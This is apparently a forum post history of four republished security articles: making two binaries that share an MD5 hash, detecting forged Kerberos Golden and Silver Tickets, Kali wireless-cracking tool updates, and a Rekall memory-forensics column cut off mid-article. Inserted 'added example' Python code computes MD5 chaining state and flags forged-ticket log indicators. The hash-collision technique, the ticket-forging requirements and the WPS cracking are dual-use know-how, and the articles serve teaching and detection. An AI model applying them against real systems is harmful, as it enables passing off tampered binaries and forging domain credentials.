Everything posted by Nytro

  1. How to make two binaries with the same MD5 hash

One question I was asked when I demo'd creating two PHP files with the same hash is: does it work on compiled binaries? Well, the answer is yes; in fact that is where I first got the idea from, in this demo. That example uses a C program as both the target and also to do the binary manipulation, which slightly obscures the way it works. It also makes use of an old, very slow implementation of the Wang attack to generate the collisions. To better and more quickly show how it works for an upcoming talk I have created a really simple example using a PHP script to manipulate a binary once compiled. I have put all the code used here on github.

Below is the super simple C program. It compares two strings and if they don't match it prints out an ASCII art picture of an angel. If they do match you get a picture of a devil.

demo.c:

    #include <string.h>
    #include <stdio.h>

    /* 191 'A's: five lines of 32 and one of 31 */
    #define DUMMY "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
                  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

    int angel();
    int devil();

    /* the two strings differ only in their last character */
    char *dummya = DUMMY "A";
    char *dummyb = DUMMY "B";

    int main()
    {
        if (strcmp(dummya, dummyb) != 0) {
            return angel();
        } else {
            return devil();
        }
    }

    int angel()
    {
        fprintf(stdout, ". ,\n");
        fprintf(stdout, ")). -===- ,((\n");
        fprintf(stdout, "))). ,(((\n");
        fprintf(stdout, "))))). .:::. ,((((((\n");
        fprintf(stdout, "))))))))). :. .: ,(((((((('\n");
        fprintf(stdout, "`))))))))))). : - : ,((((((((((((\n");
        fprintf(stdout, "))))))))))))))))_:' ':_((((((((((((((('\n");
        fprintf(stdout, " `)))))))))))).-' \\___/ '-._(((((((((((\n");
        fprintf(stdout, " `))))_._.-' __)( )(_ '-._._(((('\n");
        fprintf(stdout, " `))'---)___)))'\\_ _/'((((__(---'(('\n");
        fprintf(stdout, " `))))))))))))|' '|(((((((((((('\n");
        fprintf(stdout, " `)))))))))/' '\\((((((((('\n");
        fprintf(stdout, " `)))))))| |((((((('\n");
        fprintf(stdout, " `))))))| |(((((('\n");
        fprintf(stdout, " /' '\\\n");
        fprintf(stdout, " /' '\\\n");
        fprintf(stdout, " /' '\\\n");
        fprintf(stdout, " /' '\\\n");
        fprintf(stdout, " '---..___..---'\\\n");
        return 0;
    }

    int devil()
    {
        fprintf(stdout, " _.---**""**-.\n");
        fprintf(stdout, "._ .-' /|`.\n");
        fprintf(stdout, " \\`.' / | `.\n");
        fprintf(stdout, " V ( ; \\\n");
        fprintf(stdout, " L _.- -. `' \\\n");
        fprintf(stdout, " / `-. _.' \\ ;\n");
        fprintf(stdout, ": __ ; _ |\n");
        fprintf(stdout, ":`-.___.+-*\"': ` ; .' `. |\n");
        fprintf(stdout, " |`-/ `--*' / / /`.\\|\n");
        fprintf(stdout, ": : \\ :`.| ;\n");
        fprintf(stdout, "| | . ;/ .' ' /\n");
        fprintf(stdout, ": : / ` :__.'\n");
        fprintf(stdout, " \\`._.-' / |\n");
        fprintf(stdout, " : ) : ;\n");
        fprintf(stdout, " :----.._ | /\n");
        fprintf(stdout, " : .-. `. /\n");
        fprintf(stdout, " \\ `._ /\n");
        fprintf(stdout, " /`- /\n");
        fprintf(stdout, " : .'\n");
        fprintf(stdout, " \\ ) .-'\n");
        fprintf(stdout, " `-----*\"'\n");
        return 0;
    }

It can be compiled with gcc and executed simply by doing

    longEgg$ gcc -o demo ./demo.c
    longEgg$ chmod a+x demo
    longEgg$ ./demo

Executing the program will print out the angel since the two strings differ in the last letter. Now we have our compiled binary we need to do a bit of mucking about with it. What we are going to do is insert an MD5 collision into the long string of A's of the dummy text. We only need to insert two blocks of 64 bytes, but we need to insert it at the beginning of a block, i.e. when the byte length is a multiple of 64 bytes.

long_egg.php:

    <?php
    include __DIR__.'/MD5.php';

    $inFile = __DIR__.'/demo';
    $dummyText = str_pad('', 64, 'A');

    function replaceDummyText($input, $replacement, $position)
    {
        return substr_replace($input, $replacement, $position, strlen($replacement));
    }

    function findDummyText($filestring, $dummyText)
    {
        $pos = 0;
        $chunks = str_split($filestring, 64);
        foreach ($chunks as $chunk) {
            if ($chunk == $dummyText) {
                break 1;
            }
            $pos++;
        }
        return $pos*64;
    }

    // read in the original binary file
    $filestring = file_get_contents($inFile);

    // find the place where we have the dummy string and it's at the start of a 64 byte block
    $pos = findDummyText($filestring, $dummyText);
    printf('I want to replace %d bytes at position %d in %s'.PHP_EOL, 128, $pos, $inFile);

    $firstPart = substr($filestring, 0, $pos);
    // find the IV up to the point we want to insert then print that out
    $iv = md5_hash($firstPart);
    printf('Chaining variable up to that point is %s'.PHP_EOL, $iv);

    if (!file_exists(__DIR__.'/a')) {
        print('Run fastcoll to generate a 2 block collision in MD5'.PHP_EOL);
        return;
    }

    // replace the dummy text at the correct location
    $good = replaceDummyText($filestring, file_get_contents(__DIR__.'/a'), $pos);
    $bad = replaceDummyText($filestring, file_get_contents(__DIR__.'/b'), $pos);

    // find the second dummy string
    $secondDummyTextStart = strpos($good, str_pad('', 191, 'A'));

    // search back from where we inserted the collision the first time so we can grab the whole
    // 192 bytes and use it to replace the second string
    while ('A' == substr($filestring, $pos-1, 1)) {
        --$pos;
    }

    // the 192 bytes of str1
    $replacement = substr($good, $pos, 192);

    // replace str2 with the 192 bytes cut from one of the files;
    // the file it came from will then compare str1 and str2 as equal (0)
    $good = replaceDummyText($good, $replacement, $secondDummyTextStart);
    file_put_contents(__DIR__.'/devil', $good);
    printf('Just output new file %s with hash %s'.PHP_EOL, __DIR__.'/devil', md5($good));

    $bad = replaceDummyText($bad, $replacement, $secondDummyTextStart);
    file_put_contents(__DIR__.'/angel', $bad);
    printf('Just output new file %s with hash %s'.PHP_EOL, __DIR__.'/angel', md5($bad));

When we run the php script over it the first time it finds such a location and calculates the value of the four chaining variables of MD5 at that point in the file. It prints out the hex values concatenated together as a hash. We can now take that value and search for an MD5 collision with that initial state. The best MD5 collision finder is Marc Stevens' fastcoll. It can typically find collisions in a couple of seconds using a variant of the Wang attack. After downloading it you will need to compile it. There should be a Makefile for it in the code on github. Running it specifying the initial state and output files is shown below.

    longEgg$ wget https://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5-1_source.zip
    longEgg$ unzip fastcoll_v1.0.0.5-1_source.zip
    longEgg$ make
    longEgg$ chmod a+x fastcoll
    longEgg$ ./fastcoll -i c15cfe39c40e47f5b8ae31e6658fd1bd -o a b

The -o option specifies the output files and so will create two new files, a and b, which contain 2 blocks of binary data. These blocks only work as MD5 collisions within the binary at that point. Running the php script for a second time will create two copies of the original compiled binary with the collisions inserted in the appropriate places.

    longEgg$ I want to replace 128 bytes at position 6528 in colliding_binaries/demo
    longEgg$ Chaining variable up to that point is c15cfe39c40e47f5b8ae31e6658fd1bd
    longEgg$ Just output new file /Users/nmchugh/longEgg/devil with hash dea9dc288b6c56626997ce86ca8eb6da
    longEgg$ Just output new file /Users/nmchugh/longEgg/angel with hash dea9dc288b6c56626997ce86ca8eb6da

So now we have created two more files, angel and devil. Running each of those should give different outputs. But they should have the same MD5 value.

    longEgg$ md5 angel devil
    MD5 (angel) = dea9dc288b6c56626997ce86ca8eb6da
    MD5 (devil) = dea9dc288b6c56626997ce86ca8eb6da

Posted by Nathaniel McHugh at 1:38 PM

Source: http://natmchugh.blogspot.co.uk/2015/05/how-to-make-two-binaries-with-same-md5.html
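The post's script relies on an MD5.php that is not shown here: a function that returns the MD5 chaining variable after a block-aligned prefix, which is the value fastcoll's -i option takes. The following Python is an added example written for this page, not code from Nathaniel McHugh's repository, and it shows the Merkle-Damgard mechanics the post depends on: the internal state after the first N*64 bytes depends only on those bytes, and resuming from that state over the rest of the file gives the full MD5. That is why two 128-byte blocks that collide under a given chaining variable produce colliding files whenever the bytes before and after them are identical, and also why the blocks are useless at any other offset or prefix. The fake "binary" below is constructed (a short header followed by dummya and dummyb) and all function names are this example's own; no collision blocks are included, since producing them is fastcoll's job.

```python
"""MD5 with its chaining state exposed (added example; constructed sample data)."""
import hashlib
import math
import struct

# MD5 constants from RFC 1321: per-step rotation amounts and sine-derived additive constants.
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def _compress(state, block):
    """One MD5 compression: fold a 64-byte block into the four 32-bit chaining words."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & _MASK
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & _MASK
    return tuple((s + v) & _MASK for s, v in zip(state, (a, b, c, d)))


def _state_hex(state):
    # Little-endian word order, the same layout as a finished digest (and fastcoll's -i input).
    return struct.pack("<4I", *state).hex()


def _padding(total_len):
    """Merkle-Damgard padding for a message of total_len bytes: 0x80, zeros, 64-bit bit length."""
    pad = b"\x80" + b"\x00" * ((55 - total_len) % 64)
    return pad + struct.pack("<Q", (total_len * 8) & 0xFFFFFFFFFFFFFFFF)


def chaining_variable(prefix):
    """Internal state after absorbing a block-aligned prefix, as hex (what the PHP script prints)."""
    if len(prefix) % 64:
        raise ValueError("prefix must be a whole number of 64-byte blocks")
    state = _IV
    for off in range(0, len(prefix), 64):
        state = _compress(state, prefix[off:off + 64])
    return _state_hex(state)


def md5_from_state(state_hex, suffix, prefix_len):
    """Resume MD5 from a chaining variable and finish hashing suffix (padding uses the full length)."""
    state = struct.unpack("<4I", bytes.fromhex(state_hex))
    data = suffix + _padding(prefix_len + len(suffix))
    for off in range(0, len(data), 64):
        state = _compress(state, data[off:off + 64])
    return _state_hex(state)


def md5_hex(data):
    """Full MD5 of data: the IV is just the chaining variable of the empty prefix."""
    return md5_from_state(_state_hex(_IV), data, 0)


def matches_hashlib(data):
    """Cross-check this implementation against the standard library."""
    return md5_hex(data) == hashlib.md5(data).hexdigest()


def find_dummy_block(data, dummy=b"A" * 64):
    """Offset of the first 64-byte-aligned chunk equal to dummy, or -1 (mirrors findDummyText)."""
    for off in range(0, len(data) - 63, 64):
        if data[off:off + 64] == dummy:
            return off
    return -1


def build_sample_binary():
    """Constructed stand-in for the compiled demo: a 104-byte fake header, then dummya and dummyb."""
    header = b"\x7fELF" + bytes(range(100))      # deliberately not 64-byte aligned
    dummya = b"A" * 191 + b"A" + b"\x00"
    dummyb = b"A" * 191 + b"B" + b"\x00"
    return header + dummya + dummyb + b"\x00" * 40


def demo():
    """Locate the insertion point, print its chaining variable, and show resumption is exact."""
    binary = build_sample_binary()
    pos = find_dummy_block(binary)
    iv = chaining_variable(binary[:pos])
    # The 128-byte collision window must stay inside dummya (104 .. 104+192).
    window_fits = pos >= 104 and pos + 128 <= 104 + 192
    resumed_ok = md5_from_state(iv, binary[pos:], pos) == md5_hex(binary)
    return pos, iv, window_fits and resumed_ok


if __name__ == "__main__":
    pos, iv, ok = demo()
    print(f"I want to replace 128 bytes at position {pos}")
    print(f"Chaining variable up to that point is {iv}")
    print("resumed hash equals full hash and window fits:", ok)
```

The arithmetic behind the post's 191-character dummy (my observation, not stated in the post): in the worst case the string starts one byte past a block boundary, so the first aligned block begins 63 bytes in and the two collision blocks end 191 bytes in, which is exactly why 191 bytes of padding are enough to guarantee room for them.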
  2. Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory

by Sean Metcalf

Over the last 6 months, I have been researching forged Kerberos tickets, specifically Golden Tickets, Silver Tickets, and TGTs generated by MS14-068 exploit code (a type of Golden Ticket). I generated forged Kerberos tickets using Mimikatz and MS14-068 exploits and logged the results. Over the course of several weeks, I identified anomalies in the event logs that are a clear indication of forged ticket use in an Active Directory environment.

Kerberos Overview & Communication Process:

    1. User logs on with username & password.
    1a. Password converted to NTLM hash; a timestamp is encrypted with the hash and sent to the KDC as an authenticator in the authentication ticket (TGT) request (AS-REQ).
    1b. The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc.) & creates Ticket-Granting Ticket (TGT).
    2. The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.
    3. The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates the PAC checksum – if the DC can open the ticket & the checksum checks out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket.
    4. The TGS is encrypted using the target service account's NTLM password hash and sent to the user (TGS-REP).
    5. The user connects to the server hosting the service on the appropriate port & presents the TGS (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
    6. If mutual authentication is required by the client (think MS15-011: the Group Policy patch from February that added UNC hardening).

Unless PAC validation is required (rare), the service accepts all data in the TGS ticket with no communication to the DC.

Active Directory Kerberos Key Points:

    * Microsoft uses the NTLM password hash for Kerberos RC4 encryption.
    * Kerberos policy is only checked when the TGT is created & the TGT is the user authenticator to the DC.
    * The DC only checks the user account after the TGT is 20 minutes old to verify the account is valid or enabled.
    * TGS PAC Validation only occurs in specific circumstances. When it does, LSASS on the server sends the PAC Validation request to the DC's netlogon service (using NRPC).
    * If it runs as a service, PAC validation is optional (disabled).
    * If a service runs as System, it performs server signature verification on the PAC (computer account long-term key).

Forging Kerberos Tickets:

    * Forging Kerberos tickets depends on the password hash available to the attacker.
    * Golden Ticket requires the KRBTGT password hash.
    * Silver ticket requires the Service Account (either the computer account or user account) password hash.
    * Create anywhere and use anywhere on the network, without elevated rights.
    * Spoof access without modifying AD groups.
    * Once the KRBTGT account password is disclosed, the only way to prevent Golden Tickets is to change the KRBTGT password twice, since the current and previous passwords are kept for this account.

Golden Tickets:

Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets. As shown in the following graphic, there is no AS-REQ or AS-REP (steps 1 & 2) communication with the Domain Controller. Since a Golden Ticket is a forged TGT, it is sent to the Domain Controller as part of the TGS-REQ to get a service ticket.

The Kerberos Golden Ticket is a valid TGT Kerberos ticket since it is encrypted/signed by the domain Kerberos account (KRBTGT). The TGT is only used to prove to the KDC service on the Domain Controller that the user was authenticated by another Domain Controller. The fact that the TGT is encrypted by the KRBTGT password hash and can be decrypted by any KDC service in the domain proves it is valid.

Golden Ticket Requirements:

    * Domain Name [AD PowerShell module: (Get-ADDomain).DNSRoot]
    * Domain SID [AD PowerShell module: (Get-ADDomain).DomainSID.Value]
    * Domain KRBTGT Account NTLM password hash
    * UserID for impersonation.

The Domain Controller KDC service doesn't validate the user account in the TGT until the TGT is older than 20 minutes old, which means the attacker can use a disabled/deleted account or even a fictional account that doesn't exist in Active Directory. Microsoft's MS-KILE specification (section 5.1.3): "Kerberos V5 does not provide account revocation checking for TGS requests, which allows TGT renewals and service tickets to be issued as long as the TGT is valid even if the account has been revoked. KILE provides a check account policy (section 3.3.5.7.1) that limits the exposure to a shorter time. KILE KDCs in the account domain are required to check accounts when the TGT is older than 20 minutes. This limits the period that a client can get a ticket with a revoked account while limiting the performance cost for AD queries."

Since the domain Kerberos policy is set on the ticket when generated by the KDC service on the Domain Controller, when the ticket is provided, systems trust the ticket validity. This means that even if the domain policy states a Kerberos logon ticket (TGT) is only valid for 10 hours, if the ticket states it is valid for 10 years, it is accepted as such.

The KRBTGT account password is never changed* and the attacker can create Golden Tickets until the KRBTGT password is changed (twice). Note that a Golden Ticket created to impersonate a user persists even if the impersonated user changes their password.

It bypasses the SmartCard authentication requirement since it bypasses the usual checks the DC performs before creating the TGT.

This crafted TGT requires an attacker to have the Active Directory domain's KRBTGT password hash (typically dumped from a Domain Controller). The KRBTGT NTLM hash can be used to generate a valid TGT (using RC4) to impersonate any user with access to any resource in Active Directory. The Golden Ticket (TGT) can be generated and used on any machine, even one not domain-joined. Used to get valid TGS tickets from DCs in the AD forest and provides a great method of persisting on a domain with access to EVERYTHING!

Mitigation: Limit Domain Admins from logging on to any other computers other than Domain Controllers and a handful of Admin servers (don't let other admins log on to these servers). Delegate all other rights to custom admin groups. This greatly reduces the ability of an attacker to gain access to a Domain Controller's Active Directory database. If the attacker can't access the AD database (ntds.dit file), they can't get the KRBTGT account NTLM password hash.

Silver Tickets:

Silver Tickets are forged Ticket Granting Service tickets, also called service tickets. As shown in the following graphic, there is no AS-REQ / AS-REP (steps 1 & 2) and no TGS-REQ / TGS-REP (steps 3 & 4) communication with the Domain Controller. Since a Silver Ticket is a forged TGS, there is no communication with a Domain Controller.

Alluded to at BlackHat during the "Golden Ticket" presentation (Duckwall/Delpy) and discussed partly during Tim Medin's DerbyCon 2014 talk. Skip & Benjamin have provided additional information on Silver Tickets since, but confusion remains.

The Kerberos Silver Ticket is a valid Ticket Granting Service (TGS) Kerberos ticket since it is encrypted/signed by the service account configured with a Service Principal Name for each server the Kerberos-authenticating service runs on. While a Golden ticket is a forged TGT valid for gaining access to any Kerberos service, the silver ticket is a forged TGS. This means the Silver Ticket scope is limited to whatever service is targeted on a specific server.

While a Golden ticket is encrypted/signed with the domain Kerberos service account (KRBTGT), a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer's local SAM or service account credential). Most services don't validate the PAC (by sending the PAC checksum to the Domain Controller for PAC validation), so a valid TGS generated with the service account password hash can include a PAC that is entirely fictitious – even claiming the user is a Domain Admin without challenge or correction.

    * The attacker needs the service account password hash.
    * TGS is forged, so no associated TGT, meaning the DC is never contacted.
    * Any event logs are on the targeted server.

In my opinion, Silver Tickets can be more dangerous than Golden Tickets – while the scope is more limited than Golden Tickets, the required hash is easier to get and there is no communication with a DC when using them, so detection is more difficult than Golden Tickets.

Detecting Forged Kerberos Tickets:

Most logon & logoff events include the following detail. Normal, valid account logon event data structure:

    Security ID: DOMAIN\AccountID
    Account Name: AccountID
    Account Domain: DOMAIN

I discovered that the domain field in many events in the Windows security event log is not properly populated when forged Kerberos tickets are used. The key indicator is that the domain field is blank or contains the FQDN instead of the short (netbios) name. The likely reason for the anomalies is that third party tools that create Kerberos tickets (TGT & TGS) don't format the tickets exactly the same way as Windows does.

The following includes some of the events I have identified that are logged when forged Kerberos tickets are used. Note that Silver Ticket events could be logged on any computer in the AD domain depending on what the target is: workstations, member servers, or Domain Controllers. Golden Tickets and MS14-068 exploit tickets, all of which are TGTs, will have events logged on the Domain Controller.

NOTE: As of 4/16/2015: Mimikatz generated tickets may include the string "eo.oe.kiwi" in the domain field.

SILVER TICKET DETECTION

Silver Ticket events may have one of these issues:

    * The Account Domain field is blank when it should be DOMAIN.
    * The Account Domain field is DOMAIN FQDN when it should be DOMAIN.

Event ID: 4624 (Account Logon) – Account Domain is FQDN & should be short domain name
    Account Domain: LAB.ADSECURITY.ORG [ADSECLAB]

Event ID: 4634 (Account Logoff) – Account Domain is blank & should be short domain name
    Account Domain: _______________ [ADSECLAB]

Event ID: 4672 (Admin Logon) – Account Domain is blank & should be short domain name
    Account Domain: _______________ [ADSECLAB]

GOLDEN TICKET DETECTION

Golden Ticket events may have one of these issues:

    * The Account Domain field is blank when it should be DOMAIN.
    * The Account Domain field is DOMAIN FQDN when it should be DOMAIN.

Event ID: 4624 (Account Logon) – Account Domain is FQDN & should be short domain name
    Account Domain: LAB.ADSECURITY.ORG [ADSECLAB]

Event ID: 4672 (Admin Logon) – Account Domain is blank & should be short domain name
    Account Domain: _______________ [ADSECLAB]

MS14-068 Exploit Ticket Detection

MS14-068 events may have one of these issues:

    * The Account Domain field is blank when it should be DOMAIN.
    * The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
    * Account Name is a different account from the Security ID.

PYKEK Events

    * Event ID: 4624 (Account Logon) – The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Account Name is a different account from the Security ID.
    * Event ID: 4672 (Admin Logon) – The Account Domain field is DOMAIN FQDN when it should be DOMAIN. Account Name is a different account from the Security ID.
    * Event ID: 4768 (Kerberos TGS Request) – The Account Domain field is DOMAIN FQDN when it should be DOMAIN.

KEKEO Events

    * Event ID: 4624 (Account Logon) – The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
    * Event ID: 4672 (Admin Logon) – Account Domain is blank & should be DOMAIN.
    * Event ID: 4768 (Kerberos TGS Request) – The Account Domain field is DOMAIN FQDN when it should be DOMAIN.

Source: http://adsecurity.org/?p=1515
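The indicators above reduce to a handful of field checks on Security event records, so they are easy to turn into detection logic. The following Python is an added example, not part of Sean Metcalf's post: it parses a constructed plain-text export of 4624/4634/4672/4768 events (the "Key: Value" layout shown in the post) and flags the three anomalies the post lists, plus the "eo.oe.kiwi" marker. The domain names, account names and the log text are all made up for the example, and the function names are this example's own.

```python
"""Flag forged-ticket indicators in Security event records (added example; constructed data)."""
import re

# Event IDs the post identifies as carrying the anomaly when forged tickets are used.
WATCHED_EVENTS = {"4624", "4634", "4672", "4768"}
MIMIKATZ_MARKER = "eo.oe.kiwi"


def parse_events(text):
    """Split a blank-line-separated text export into one {field: value} dict per event."""
    events = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        event = {}
        for line in chunk.splitlines():
            if ":" not in line:
                continue
            key, _, value = line.partition(":")
            event[key.strip()] = value.strip()
        if event:
            events.append(event)
    return events


def check_event(event, netbios, fqdn):
    """Return the list of indicators present in one event (empty list = looks normal)."""
    findings = []
    if event.get("Event ID", "") not in WATCHED_EVENTS:
        return findings
    domain = event.get("Account Domain", "")
    if domain == "":
        findings.append("account-domain-blank")            # should be the short NetBIOS name
    elif domain.upper() == fqdn.upper():
        findings.append("account-domain-is-fqdn")          # FQDN where NetBIOS name is expected
    elif MIMIKATZ_MARKER in domain.lower():
        findings.append("mimikatz-marker-in-domain")
    # Security ID is displayed as DOMAIN\Account; the name part must match Account Name.
    sid = event.get("Security ID", "")
    name = event.get("Account Name", "")
    if "\\" in sid and name and sid.split("\\", 1)[1].lower() != name.lower():
        findings.append("account-name-sid-mismatch")
    return findings


def analyze(text, netbios, fqdn):
    """Run check_event over every record; return (event_id, findings) for the suspicious ones."""
    hits = []
    for event in parse_events(text):
        findings = check_event(event, netbios, fqdn)
        if findings:
            hits.append((event["Event ID"], findings))
    return hits


# Constructed sample: one normal logon, then records shaped like the post's Silver, Golden,
# MS14-068 and Mimikatz examples, and one event ID outside the watched set.
SAMPLE_LOG = """\
Event ID: 4624
Security ID: ADSECLAB\\JoeUser
Account Name: JoeUser
Account Domain: ADSECLAB

Event ID: 4624
Security ID: ADSECLAB\\JoeUser
Account Name: JoeUser
Account Domain: LAB.ADSECURITY.ORG

Event ID: 4672
Security ID: ADSECLAB\\Administrator
Account Name: Administrator
Account Domain:

Event ID: 4768
Security ID: ADSECLAB\\JoeUser
Account Name: GhostUser
Account Domain: LAB.ADSECURITY.ORG

Event ID: 4624
Security ID: ADSECLAB\\JoeUser
Account Name: JoeUser
Account Domain: eo.oe.kiwi

Event ID: 4776
Security ID: ADSECLAB\\JoeUser
Account Name: JoeUser
Account Domain:
"""

if __name__ == "__main__":
    for event_id, findings in analyze(SAMPLE_LOG, "ADSECLAB", "LAB.ADSECURITY.ORG"):
        print(event_id, ", ".join(findings))
```

Before deploying a rule like this, baseline the blank-domain check: 4624 events for local, service and anonymous logons legitimately carry values such as a workstation name, "NT AUTHORITY" or "-" rather than the domain's NetBIOS name, so the rule should be scoped to domain accounts (for example by the Security ID prefix) to keep false positives down.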
  3. Pixiewps, Reaver & Aircrack-ng Wireless Penetration Testing Tool Updates

May 4, 2015 g0tmi1k Penetration Testing

A short while ago, we packaged and pushed out a few important wireless penetration testing tool updates for aircrack-ng, pixiewps and reaver into Kali's repository. These new additions and updates are fairly significant, and may even change your wireless attack workflows. Here's a short run-down of the updates and the changes they bring.

Pixiewps – Bruteforce WPS pins in seconds

Pixiewps is a tool used for offline brute forcing of WPS pins, while exploiting the low or non-existing entropy of some wireless access points, also known as the pixie dust attack, discovered by Dominique Bongard (slides and video). The pixiewps tool (developed by wiire) was born out of the Kali forums, and the development of the tool can be tracked throughout an interesting forum post. In the correct environment, pixiewps dramatically speeds up the WPS brute force attack time from what was taking up to 12 hours to a . This new attack is mind numbing, and we are somewhat surprised that it hasn't been discussed on a wider basis. Watch our following video closely, and see how we extract the WPA shared key of this EdiMAX wireless access point in a few seconds using updated versions of pixiewps and reaver, already packaged in Kali.

Aircrack-ng v1.2 RC2 Update

Aircrack-ng is the de facto penetration tool suite – essential for any wireless penetration tests or assessments. In this latest Aircrack-ng release, amongst the normal bug fixes and code improvements there has been a significant change to airmon-ng, the tool used to put wireless cards into monitor mode. Other new and notable features are that airtun-ng is now able to decrypt WPA, as well as several new airodump-ng flags, such as --wps and --uptime.

Also notice the new naming convention of the wireless virtual interfaces – wlanXmon, as opposed to monX. Goodbye mon0, hello wlan0mon!

For the last few releases, the aircrack-ng suite had bundled with it aircrack-zc, which uses an improved method of placing wireless cards into monitor mode, as well as more verbose output options. With the release of Aircrack-ng 1.2 RC2, aircrack-zc has officially replaced the original aircrack-ng as the new standard.

More verbose airmon-ng output

When things are going right, everything is great! However, when this isn't the case and you need to troubleshoot wireless issues, you can now use a single command, airmon-ng --verbose start wlan0, to gather all the relevant information needed.

    root@kali:~# airmon-ng --verbose start wlan0
    No interfering processes found
    No LSB modules are available.
    Distributor ID: Kali
    Description: Kali GNU/Linux 1.1.0
    Release: 1.1.0
    Codename: moto
    Linux kali 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 (2015-03-02) x86_64 GNU/Linux
    Detected VM using dmi_info
    This appears to be a VMware Virtual Machine
    If your system supports VT-d, it may be possible to use PCI devices
    If your system does not support VT-d, you can only use USB wifi cards
    K indicates driver is from 3.18.0-kali3-amd64
    V indicates driver comes directly from the vendor, almost certainly a bad thing
    S indicates driver comes from the staging tree, these drivers are meant for reference not actual use, BEWARE
    ? indicates we do not know where the driver comes from... report this
    X[PHY]Interface Driver[stack]-FirmwareRev Chipset Extended Info
    K[phy0]wlan0 rtl8187[mac80211]-N/A Realtek Semiconductor Corp. RTL8187
    (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
    (mac80211 station mode vif disabled for [phy0]wlan0)
    root@kali:~#

You can find aircrack-ng's full change log at the following address: http://www.aircrack-ng.org/doku.php?id=airmon-ng.

Updated Reaver WPS attack tool

The reaver project was originally developed by Craig Heffner, and the last release was 1.4. As the project seems to have been abandoned, several forks have cropped up – one belonging to a member of the Kali forums, t6_x, who has also integrated the pixiewps attack into a newly minted 1.5.2 release. This new version implements an array of improvements on the original version, and will hopefully be actively maintained by the community.

The Kali Community Rocks

One of the advantages of being a Kali forum moderator is that you get to witness the community grow and interact. Since the original pixiewps thread started by soxrok2212, it has received over 300 responses, bringing about the implementation of new ideas and updates to the tool. Watching this project emerge from a single forum post all the way to the release of the tool, and seeing the co-operation between the various tool developers while working to get interoperability between their tools, was a real privilege.

Stay fresh with Kali-Linux

You don't need to do anything special to get this awesome tool chain, just keep your Kali-Linux up-to-date:

    apt-get update
    apt-get dist-upgrade

Happy penetration testing!

Source: https://www.kali.org/penetration-testing/pixiewps-reaver-aircrack-ng-updates/
  4. toolsmith: Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem

Prerequisites

    * Any Python-enabled system if running from source
    * There is a standalone exe with all dependencies met, available for Windows

Introduction

This month represents our annual infosec tools edition, and I've got a full scenario queued up for you. We're running with a vignette based in absolute reality. When your organizations are attacked (you already have been) and a compromise occurs (assume it will) it may well follow a script (pun intended) something like this. The most important lesson to be learned here is how to assess attacks of this nature, recognizing that little or none of the following activity will occur on the file system, instead running in memory. When we covered Volatility in September 2011 we invited readers to embrace memory analysis as an absolutely critical capability for incident responders and forensic analysts. This month, in a similar vein, we'll explore Rekall. The project's point man, Michael Cohen, branched Volatility, aka the scudette branch, in December 2011, as a Technology Preview. In December 2013, it was completely forked and became Rekall to allow inclusion in GRR as well as methods for memory acquisition, and to advance the state of the art in memory analysis. The 2nd of April, 2015, saw the release of Rekall 1.3.1 Dammastock, named for Dammastock Mountain in the Swiss Alps. An update release to 1.3.2 was posted to Github 26 APR 2015.

Michael provided personal insight into his process and philosophy, which I'll share verbatim in part here:

"For me memory analysis is such an exciting field. As a field it is wedged between so many other disciplines - such as reverse engineering, operating systems, data structures and algorithms. Rekall as a framework requires expertise in all these fields and more. It is exciting for me to put memory analysis to use in new ways. When we first started experimenting with live analysis I was surprised how reliable and stable this was. No need to take and manage large memory images all the time. The best part was that we could just run remote analysis for triage using a tool like GRR - so now we could run the analysis not on one machine at the time but several thousand at a time! Then, when we added virtual machine introspection support we could run memory analysis on the VM guest from outside without any special support in the hypervisor - and it just worked!"

While we won't cover GRR here, recognize that the ability to conduct live memory analysis across thousands of machines, physical or virtual, without impacting stability on target systems is a massive boon for datacenter and cloud operators.

Scenario Overview

